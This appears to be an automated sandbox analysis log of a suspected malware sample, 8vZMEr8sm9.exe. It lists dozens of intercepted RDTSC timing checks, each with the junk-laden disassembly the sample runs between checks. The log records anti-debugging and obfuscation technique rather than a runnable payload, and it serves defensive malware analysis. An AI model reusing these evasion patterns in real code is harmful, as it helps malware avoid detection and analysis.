Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF03A6 second address: 4AF03AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF03AC second address: 4AF03D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d call 00007F9B3082992Eh 0x00000012 movzx eax, dx 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF03D8 second address: 4AF040C instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 ror eax, cl 0x0000000a jmp 00007F9B30E293BBh 0x0000000f leave 0x00000010 pushad 0x00000011 mov bh, al 0x00000013 popad 0x00000014 retn 0004h 0x00000017 nop 0x00000018 mov esi, eax 0x0000001a lea eax, dword ptr [ebp-08h] 0x0000001d xor esi, dword ptr [00142014h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push eax 0x00000026 lea eax, dword ptr [ebp-10h] 0x00000029 push eax 0x0000002a call 00007F9B358197DBh 0x0000002f push FFFFFFFEh 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 jmp 00007F9B30E293BFh 0x00000039 mov edi, ecx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF040C second address: 4AF0412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0412 second address: 4AF0416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0416 second address: 4AF0481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007F9B30829933h 0x0000000e ret 0x0000000f nop 0x00000010 push eax 0x00000011 call 00007F9B35219D82h 0x00000016 mov edi, edi 0x00000018 jmp 00007F9B30829936h 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F9B30829936h 0x00000026 xchg eax, ebp 0x00000027 jmp 00007F9B30829930h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push edi 0x00000032 pop esi 0x00000033 mov ax, bx 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AF0481 second address: 4AF0487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0021 second address: 4AA0073 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 2D9C246Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, esi 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F9B30829933h 0x00000016 jmp 00007F9B30829933h 0x0000001b popfd 0x0000001c call 00007F9B30829938h 0x00000021 pop esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0073 second address: 4AA0078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0078 second address: 4AA0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, 75h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9B30829935h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0099 second address: 4AA0119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9B30E293BEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F9B30E293C0h 0x00000016 and esp, FFFFFFF8h 0x00000019 pushad 0x0000001a jmp 00007F9B30E293BEh 0x0000001f mov bx, ax 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push ebx 0x00000028 pop ecx 0x00000029 pushfd 0x0000002a jmp 00007F9B30E293C5h 0x0000002f sbb ax, 1E66h 0x00000034 jmp 00007F9B30E293C1h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0119 second address: 4AA011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA011F second address: 4AA0123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0123 second address: 4AA0127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0127 second address: 4AA0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bh, ah 0x0000000c jmp 00007F9B30E293C1h 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9B30E293BDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0155 second address: 4AA01B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, A9B2h 0x00000007 mov dx, AEFEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f jmp 00007F9B30829932h 0x00000014 mov dword ptr [esp], ebx 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b pushfd 0x0000001c jmp 00007F9B3082992Ah 0x00000021 sbb eax, 0F04CDF8h 0x00000027 jmp 00007F9B3082992Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebx, dword ptr [ebp+10h] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F9B30829930h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA01B2 second address: 4AA01C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA01C1 second address: 4AA0234 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9B3082992Ch 0x00000011 sbb si, B9E8h 0x00000016 jmp 00007F9B3082992Bh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 pushfd 0x00000021 jmp 00007F9B30829932h 0x00000026 sub ah, 00000048h 0x00000029 jmp 00007F9B3082992Bh 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 mov cl, dl 0x00000035 mov ah, 1Fh 0x00000037 popad 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0234 second address: 4AA0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0238 second address: 4AA023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA023E second address: 4AA0260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0260 second address: 4AA0266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0266 second address: 4AA0287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ah, 91h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0287 second address: 4AA02DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 31F5BEF1h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov di, 40B0h 0x00000010 pushfd 0x00000011 jmp 00007F9B30829939h 0x00000016 add ax, 8C36h 0x0000001b jmp 00007F9B30829931h 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 pushad 0x00000024 call 00007F9B3082992Ch 0x00000029 pop edi 0x0000002a push eax 0x0000002b push edx 0x0000002c mov dl, ah 0x0000002e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA02DC second address: 4AA032E instructions: 0x00000000 rdtsc 0x00000002 call 00007F9B30E293C9h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e mov eax, edi 0x00000010 pushad 0x00000011 jmp 00007F9B30E293BFh 0x00000016 mov bx, cx 0x00000019 popad 0x0000001a popad 0x0000001b je 00007F9BA3B176B6h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9B30E293C1h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA032E second address: 4AA0399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007F9B3082992Eh 0x00000015 je 00007F9BA3517BF9h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edi, 02C2BDC0h 0x00000023 pushfd 0x00000024 jmp 00007F9B30829939h 0x00000029 sbb esi, 40FBDDC6h 0x0000002f jmp 00007F9B30829931h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0399 second address: 4AA03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F9B30E293C3h 0x0000000c xor ecx, 512A84FEh 0x00000012 jmp 00007F9B30E293C9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov edx, dword ptr [esi+44h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9B30E293BDh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA03E8 second address: 4AA04A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov edi, eax 0x00000010 mov esi, 6A396135h 0x00000015 popad 0x00000016 movzx esi, di 0x00000019 popad 0x0000001a test edx, 61000000h 0x00000020 pushad 0x00000021 call 00007F9B30829933h 0x00000026 pushfd 0x00000027 jmp 00007F9B30829938h 0x0000002c xor eax, 07325FE8h 0x00000032 jmp 00007F9B3082992Bh 0x00000037 popfd 0x00000038 pop eax 0x00000039 pushfd 0x0000003a jmp 00007F9B30829939h 0x0000003f sub ax, C606h 0x00000044 jmp 00007F9B30829931h 0x00000049 popfd 0x0000004a popad 0x0000004b jne 00007F9BA3517B28h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F9B30829938h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA04A8 second address: 4AA04AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90769 second address: 4A9076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A9076D second address: 4A9078A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A9078A second address: 4A90790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90790 second address: 4A90794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90794 second address: 4A907B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829933h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A907B4 second address: 4A907B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A907B8 second address: 4A907CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A907CA second address: 4A907DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B30E293BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A907DC second address: 4A907E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A908F3 second address: 4A908F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A908F9 second address: 4A908FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A908FD second address: 4A9093B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [77816968h], 00000002h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ebx, 1E54D2AEh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, edx 0x0000001b popad 0x0000001c jne 00007F9BA3B1EE53h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov di, cx 0x00000028 call 00007F9B30E293C4h 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A9093B second address: 4A9097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F9B3082992Ch 0x0000000b jmp 00007F9B30829935h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 jmp 00007F9B3082992Eh 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A9097E second address: 4A90982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90982 second address: 4A90986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90986 second address: 4A9098C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A9098C second address: 4A90992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90992 second address: 4A90996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90996 second address: 4A9099A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A9099A second address: 4A909BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9B30E293C8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A909BD second address: 4A909C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A909C3 second address: 4A909D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, B951h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A909D6 second address: 4A909DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A909DC second address: 4A909E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A909E0 second address: 4A909E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A909E4 second address: 4A909F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A909F3 second address: 4A90A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30829939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90A10 second address: 4A90A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B30E293BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90A20 second address: 4A90A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007F9B30829937h 0x00000010 push dword ptr [ebp+14h] 0x00000013 jmp 00007F9B30829936h 0x00000018 push dword ptr [ebp+10h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90A64 second address: 4A90A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90A68 second address: 4A90A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90A6C second address: 4A90A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90A72 second address: 4A90A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90A78 second address: 4A90A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90A92 second address: 4A90AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B3082992Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90AA3 second address: 4A90AE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F9B30E293BEh 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9B30E293C7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90AE3 second address: 4A90B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9B3082992Fh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esp, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9B30829931h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4A90B0D second address: 4A90B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, A93Eh 0x00000011 mov esi, ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30FD1C second address: 30FD22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 30FD22 second address: 30FD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0F1B second address: 4AA0F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 push ecx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0F2F second address: 4AA0F58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9B30E293C0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0F58 second address: 4AA0F67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0F67 second address: 4AA0F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0F6D second address: 4AA0FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop esi 0x00000011 pushfd 0x00000012 jmp 00007F9B30829937h 0x00000017 or esi, 080452DEh 0x0000001d jmp 00007F9B30829939h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0CA4 second address: 4AA0CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9B30E293C3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 4AA0CC4 second address: 4AA0CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
